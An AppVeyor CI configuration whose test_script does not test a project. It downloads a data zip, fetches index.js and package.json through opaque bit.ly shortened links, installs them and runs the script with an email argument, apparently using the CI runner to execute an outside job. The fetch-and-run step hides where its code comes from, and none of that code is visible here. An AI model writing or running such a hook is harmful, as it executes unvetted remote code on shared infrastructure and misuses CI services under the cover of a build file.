version: 1.0.{build}
branches:
  except:
    - gh-pages
skip_tags: true
max_jobs: 1
install:
  - ps: Install-Product node 14
test_script:
  - curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/linkProfiles.zip -o lunarCrushData.zip
  - unzip lunarCrushData.zip -d lunarCrushData
  - curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
  - npm i -s
  - node index -t 58 -r 2 -e emailishere

build: off